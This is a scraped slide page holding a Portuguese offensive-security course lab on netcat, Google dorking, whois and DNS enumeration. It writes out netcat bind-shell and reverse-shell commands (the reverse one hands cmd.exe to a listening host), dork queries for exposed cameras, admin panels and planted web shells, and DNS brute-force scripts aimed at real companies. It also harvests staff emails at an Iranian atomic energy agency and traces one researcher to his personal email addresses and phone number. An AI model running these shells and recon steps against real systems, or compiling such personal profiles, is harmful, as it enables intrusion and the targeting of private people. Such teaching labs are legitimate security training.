Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF Primer
 
DMVPN
DMVPNDMVPN
DMVPN
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
 
Tomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNSTomas Hlavacek - IP fragmentation attack on DNS
Tomas Hlavacek - IP fragmentation attack on DNS
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
 
20141106 asfws unicode_hacks
20141106 asfws unicode_hacks20141106 asfws unicode_hacks
20141106 asfws unicode_hacks
 
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Linux networking commands
Linux networking commandsLinux networking commands
Linux networking commands
 

Ähnlich wie 2 netcat enum-pub

Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
 
Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Hiroshi Ota
 
Openstack 101
Openstack 101Openstack 101
Openstack 101POSSCON
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
 
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopEBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopPascal Charest
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commandsHanan Nmr
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Nikhil Raj
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
PythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesPythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesTatiana Al-Chueyr
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network IssuesApcera
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Daniele Albrizio
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyYodalee
 

Ähnlich wie 2 netcat enum-pub (20)

Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Linux networking
Linux networkingLinux networking
Linux networking
 
Bsides final
Bsides finalBsides final
Bsides final
 
Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015Network Test Automation - Net Ops Coding 2015
Network Test Automation - Net Ops Coding 2015
 
Openstack 101
Openstack 101Openstack 101
Openstack 101
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
 
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopEBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
EBU DRW 2011 - CRC-mmbTools - Software Radio Workshop
 
Linux Network commands
Linux Network commandsLinux Network commands
Linux Network commands
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
 
PythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummiesPythonBrasil[8] - CPython for dummies
PythonBrasil[8] - CPython for dummies
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi
 
Gameboy emulator in rust and web assembly
Gameboy emulator in rust and web assemblyGameboy emulator in rust and web assembly
Gameboy emulator in rust and web assembly
 

Mehr von Cassio Ramos

Redes de Banda Larga
Redes de Banda LargaRedes de Banda Larga
Redes de Banda LargaCassio Ramos
 
Block disp-entrada e saida
Block disp-entrada e saidaBlock disp-entrada e saida
Block disp-entrada e saidaCassio Ramos
 
Trabalho sobre truecrypt
Trabalho sobre truecryptTrabalho sobre truecrypt
Trabalho sobre truecryptCassio Ramos
 
Exemplo de Script Iptables
Exemplo de Script IptablesExemplo de Script Iptables
Exemplo de Script IptablesCassio Ramos
 
Segurança em Aplicações Web
Segurança em Aplicações WebSegurança em Aplicações Web
Segurança em Aplicações WebCassio Ramos
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5Cassio Ramos
 

Mehr von Cassio Ramos (20)

Aula Inaugural
Aula InauguralAula Inaugural
Aula Inaugural
 
Redes de Banda Larga
Redes de Banda LargaRedes de Banda Larga
Redes de Banda Larga
 
Block disp-entrada e saida
Block disp-entrada e saidaBlock disp-entrada e saida
Block disp-entrada e saida
 
Trabalho sobre truecrypt
Trabalho sobre truecryptTrabalho sobre truecrypt
Trabalho sobre truecrypt
 
Gpo
GpoGpo
Gpo
 
Tunneling
TunnelingTunneling
Tunneling
 
Truecrypt
TruecryptTruecrypt
Truecrypt
 
Endian firewall
Endian firewallEndian firewall
Endian firewall
 
GnuPG
GnuPGGnuPG
GnuPG
 
Exemplo de Script Iptables
Exemplo de Script IptablesExemplo de Script Iptables
Exemplo de Script Iptables
 
Segurança Linux
Segurança LinuxSegurança Linux
Segurança Linux
 
RFID - Parte 2
RFID - Parte 2RFID - Parte 2
RFID - Parte 2
 
RFID - Parte 1
RFID - Parte 1RFID - Parte 1
RFID - Parte 1
 
Segurança em Aplicações Web
Segurança em Aplicações WebSegurança em Aplicações Web
Segurança em Aplicações Web
 
Anonimato na Web
Anonimato na Web Anonimato na Web
Anonimato na Web
 
Engenharia Social
Engenharia SocialEngenharia Social
Engenharia Social
 
Tutorial Maltego
Tutorial MaltegoTutorial Maltego
Tutorial Maltego
 
Curso hacking com BT5
Curso hacking com BT5Curso hacking com BT5
Curso hacking com BT5
 
Topologia lab
Topologia labTopologia lab
Topologia lab
 
Redes - Aula 2
Redes - Aula 2Redes - Aula 2
Redes - Aula 2
 

2 netcat enum-pub

  • 1. Laboratório do Curso de Segurança Ofensiva Netcat e Enumeração (Google Hacking, Whois e DNS) 1. NETCAT a) Ajuda root@bt:~/lab_bash-script# nc -h [v1.10-38] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port] options: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: lo-hi [inclusive]; hyphens in port names must be backslash escaped (e.g. 'ftp-data'). root@bt:~/lab_bash-script# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 1
  • 2. b) Banner grabbing Verificando portas abertas e lendo banners root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21 (UNKNOWN) [172.16.49.100] 21 (ftp) open 220 (vsFTPd 2.3.0) root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80 (UNKNOWN) [172.16.49.100] 80 (www) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 20 Jun 2012 22:01:42 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT ETag: "c5af2-b1-4c2ee7bee7e05" Accept-Ranges: bytes Content-Length: 177 Vary: Accept-Encoding Connection: close Content-Type: text/html c) CHATT Simples No Backtrack nc -lvp 4444 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 2
  • 3. No Windows XP-SP2 nc -nv 172.16.49.130 4444 Basta digitar qualquer coisa em qualquer uma das máquinas d) Administração Remota - BIND SHEL No BT localizado na rede externa root@bt:~# nc -lvp 4444 -e /bin/bash listening on [any] 4444 ... No maquina windows XP-SP2 na rede interna C:>nc -nv 172.16.49.130 4444 (UNKNOWN) [172.16.49.130] 4444 (?) open ls Desktop lab_bash-script rota.sh Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 3
  • 4. - REVERSE SHELL – NC No BT localizado na rede externa root@bt:~# nc -lvp 4444 listening on [any] 4444 ... Na máquina windows XP-SP2 na rede interna C:>nc -nv 172.16.49.130 4444 -e cmd.exe (UNKNOWN) [172.16.49.130] 4444 (?) open Resultado no BT root@bt:~# nc -lvp 4444 listening on [any] 4444 ... 172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:>hostname hostname CTP028 C:> e) Port Scan BT externo scaneando o Firewall (portas 21 a 30) root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30 (UNKNOWN) [172.16.49.100] 30 (?) : Connection refused (UNKNOWN) [172.16.49.100] 29 (?) : Connection refused (UNKNOWN) [172.16.49.100] 28 (?) : Connection refused (UNKNOWN) [172.16.49.100] 27 (?) : Connection refused (UNKNOWN) [172.16.49.100] 26 (?) : Connection refused (UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused (UNKNOWN) [172.16.49.100] 24 (?) : Connection refused (UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused (UNKNOWN) [172.16.49.100] 22 (ssh) open (UNKNOWN) [172.16.49.100] 21 (ftp) open Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 4
  • 5. f) Transferência de Arquivos BT externo scaneando o Firewall (portas 21 a 30) root@bt:~# nc -lvp 4444 > output.txt listening on [any] 4444 ... 172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224 No windows XP-SP2 na rede interna C:>nc.exe -nv 172.16.49.130 4444 < arq1.txt (UNKNOWN) [172.16.49.130] 4444 (?) open Resultado root@bt:~# ls Desktop lab_bash-script output.txt rota.sh root@bt:~# more output.txt teste de transferencia root@bt:~# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 5
  • 6. 2. Google Search google search operators - verificar site operator e outros site:offensive-security.com - ver quantas pag web tem o domínio - paginas indexadas Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 6
  • 7. site www.offensive-security.com filetype:pdf (só PDF) site:aeoi.org.ir (21.800 pages) Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 7
  • 8. intitle:"Remote Desktop Web Connection" inurl:tsweb Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 8
  • 9. google hacking database -- ghdb google hacking database site com webmin rodando inurl:10000 webmin Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 9
  • 10. site com vnc server rodando intitle:"VNC viewer for java" --- servidores VNC http://okbk.myvnc.com:5800/ Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 10
  • 11. servidor de impressão intitle:"Network Print Server" filetype:shtm interface web roteador speed stream intitle:"SpeedStream Router Management Interface" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 11
  • 12. intitle:"Setup Home" "You will need * log in before * * change * settings" (belkin) Camera de Seguranca inurl:"viewerframe?mode=motion" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 12
  • 13. inurl:"ViewerFrame?Mode=" inurl:"view/index.shtml" "please visit" intitle:"i-Catcher Console" Copyright "iCode" intitle:"everfocus edsr applet" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 13
  • 14. Software de videoconf intext:"Videoconference Management System" ext:htm phpmyadmin aberto intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 14
  • 15. Norton AV for gateways inurl:"8003/Display?what=" contatos MSN filetype:ctt "msn" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 15
  • 16. Kickstart #kickstart filetype:cfg #kickstart filetype:cfg site:gov.br CUIDADO!!!!!! backdoor apache intitle:r57 shell filetype:php Site com backdoor plantado - antichat no title intitle:"Antichat Shell" "disable functions" Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 16
  • 17. 3. Google Search Social aeoi.org.ir puro no google - ver emails utilizar theharvester.py (script em python no BT) root@bt:~# cd /pentest/enumeration/theharvester/ root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google [-] Searching in Google: Searching 0 results... Searching 100 results... Searching 200 results... [+] Emails found: -----------------hkazemian@aeoi.org.ir sjahmadi@aeoi.org.ir smshirvani@aeoi.org.ir mmostaedi@aeoi.org.ir AA37120067@aeoi.org.ir jrahighi@aeoi.org.ir sabolhosseini@aeoi.org.ir mghannadi@aeoi.org.ir rd@aeoi.org.ir Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 17
  • 18. usar hkazemian@aeoi.org.ir é um pesquisador, tem email yahoo usar hkazemian@yahoo.com Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 18
  • 19. ver SPAG Zeolite end da empress tel de contato e outro email do gmail - procurar foto usar hosseinkazemian@gmail.com - procurando apto veja telefone Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 19
  • 20. Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 20
  • 21. 4. Whois Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 21
  • 22. Consulta whois root@bt:~# whois checkpoint.com | more Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Server Name: CHECKPOINT.COM IP Address: 216.200.241.66 Registrar: NETWORK SOLUTIONS, LLC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com/en_US/ Domain Name: CHECKPOINT.COM Registrar: NETWORK SOLUTIONS, LLC. Whois Server: whois.networksolutions.com Referral URL: http://www.networksolutions.com/en_US/ Name Server: NS2.CHECKPOINT.COM Name Server: NS6.CHECKPOINT.COM Name Server: NS8.CHECKPOINT.COM Name Server: NS9.CHECKPOINT.COM Status: clientTransferProhibited Updated Date: 30-may-2012 Creation Date: 29-mar-1994 Expiration Date: 30-mar-2018 Administrative Contact, Technical Contact: Admin, DNS hostmaster@CHECKPOINT.COM Check Point Software Technologies Ltd. 3A Jabotinsky St. Ramat-Gan, 52520 IL +972-3-7534555 fax: +972-3-5759256 Record expires on 30-Mar-2018. Record created on 29-Mar-1994. Database last updated on 20-Jun-2012 22:30:44 EDT. Domain servers in listed order: NS2.CHECKPOINT.COM NS6.CHECKPOINT.COM NS8.CHECKPOINT.COM NS9.CHECKPOINT.COM 206.184.151.195 194.29.32.199 216.228.148.29 194.29.38.64 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 22
  • 23. Consulta Reversa whois root@bt:~# whois 216.200.241.66 # # Query terms are ambiguous. The query is assumed to be: # "n 216.200.241.66" # # Use "?" to get help. # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext= netref2 # CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1) 216.200.241.64 - 216.200.241.79 Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 216.200.255.255 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 23
  • 24. 5. DNS Consultas Manuais root@bt:~# nslookup www.checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: Name: www.checkpoint.com Address: 216.200.241.66 Consulta de Servidor de Email e de Nomes do domínio root@bt:~# nslookup > set type=mx > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com mail exchanger = 12 sami.checkpoint.com. checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com. Authoritative answers can be found from: > set type=ns > checkpoint.com Server: 172.16.49.2 Address: 172.16.49.2#53 Non-authoritative answer: checkpoint.com nameserver = ns2.checkpoint.com. checkpoint.com nameserver = ns6.checkpoint.com. checkpoint.com nameserver = ns8.checkpoint.com. checkpoint.com nameserver = ns9.checkpoint.com. checkpoint.com nameserver = ns1.checkpoint.com. Authoritative answers can be found from: > Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 24
  • 25. - DNS Information Gathering 1- forward lookup BF - tentar acertar nomes validos root@bt:~/lab_DNS# host www.checkpoint.com www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10 root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN) root@bt:~/lab_DNS# - usar script1.sh no BT para FB (sem manipulação) root@bt:~/lab_DNS# more script_dns1.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com done - usar script2.sh no BT para FB ("has address") root@bt:~/lab_DNS# more script_dns2.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" done root@bt:~/lab_DNS# ./script_dns2.sh forums.checkpoint.com has address 194.29.38.13 ftp.checkpoint.com has address 194.29.38.25 ftps.checkpoint.com has address 194.29.38.27 mailhost.checkpoint.com has address 194.29.32.199 cale.checkpoint.com has address 194.29.32.199 mx1.checkpoint.com has address 194.29.38.66 ns.checkpoint.com has address 194.29.32.199 ns1.checkpoint.com has address 208.185.174.140 ns2.checkpoint.com has address 208.185.174.141 register.checkpoint.com has address 194.29.38.35 search.us.checkpoint.com has address 209.87.209.207 smtp.checkpoint.com has address 194.29.34.68 www.checkpoint.com has address 216.200.241.66 www.checkpoint.com has address 216.200.241.66 root@bt:~/lab_DNS# Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 25
  • 26. - usar script3.sh no BT para FB (só IPs) root@bt:~/lab_DNS# more script_dns3.sh #!/bin/bash for name in $(cat /pentest/enumeration/dns/dnsenum/dns.txt);do host $name.checkpoint.com | grep "has address" | cut -d" " -f4 done root@bt:~/lab_DNS# ./script_dns3.sh 194.29.38.13 194.29.38.25 194.29.38.27 194.29.32.199 194.29.32.199 194.29.38.66 194.29.32.199 208.185.174.140 208.185.174.141 194.29.38.35 209.87.209.207 194.29.34.68 216.200.241.66 216.200.241.66 2- reverse lookup BF - Tentar resolução Reversa root@bt:~/lab_DNS# host 216.200.241.66 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done 64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net. 65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com. 66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com. 67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com. 68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com. 69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com. 70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com. 71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com. 72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com. 73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com. 74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com. 75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com. 76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com. 77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com. 78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com. 79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net. Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 26
  • 27. 3- Zone transfer root@bt:~# host -t ns offensive-security.com offensive-security.com name server ns4.no-ip.com. offensive-security.com name server ns2.no-ip.com. offensive-security.com name server ns1.no-ip.com. offensive-security.com name server ns3.no-ip.com. offensive-security.com name server ns5.no-ip.com. root@bt:~# host -l offensive-security.com ns1.no-ip.com ; Transfer failed. Using domain server: Name: ns1.no-ip.com Address: 204.16.255.55#53 Aliases: Host offensive-security.com.localdomain not found: 9(NOTAUTH) ; Transfer failed. ------tentar com todos servidores de nomes - (primário e secundários) ------fazer com aeoi.org.ir e estacio.br Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 27
  • 28. Usar /pentest/enumeration/dnsenum root@bt:/pentest/enumeration/dns/dnsenum# ls dns-big.txt dnsenum.pl dns.txt README.txt root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br estacio.br 5 IN A 200.216.152.71 Name Servers: ns1.estacio.br ns2.estacio.br 5 5 IN A IN A 200.216.152.249 200.216.152.250 Mail (MX) Servers: Mail.Global.FrontBridge.com 5 IN A 216.32.180.22 Mail.Global.FrontBridge.com 5 IN A 216.32.181.178 estacio.br 1800 IN TXT estacio.br 1800 IN A 200.216.152.71 1989163337.estacio.br 1800 IN CNAME mail._domainkey.estacio.br 14400 IN TXT agenda.estacio.br 1800 IN A 200.216.152.71 agendaconselho.estacio.br 1800 IN A 200.216.152.71 aluno.estacio.br 1800 IN MX biblioteca.estacio.br 1800 IN CNAME bibliotecasonora.estacio.br 1800 IN A 200.216.152.90 blogdopresidente.estacio.br 1800 IN A 200.216.152.149 bquestoes.estacio.br 1800 IN A 200.216.152.63 adm.bquestoes.estacio.br 1800 IN A 200.216.152.62 provas.bquestoes.estacio.br 1800 IN A 200.216.152.63 Solution Consultoria e Treinamento www.solution-rj.com.br Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ. Email: solution@solution-rj.com.br/Tel: 021 8732-9993 28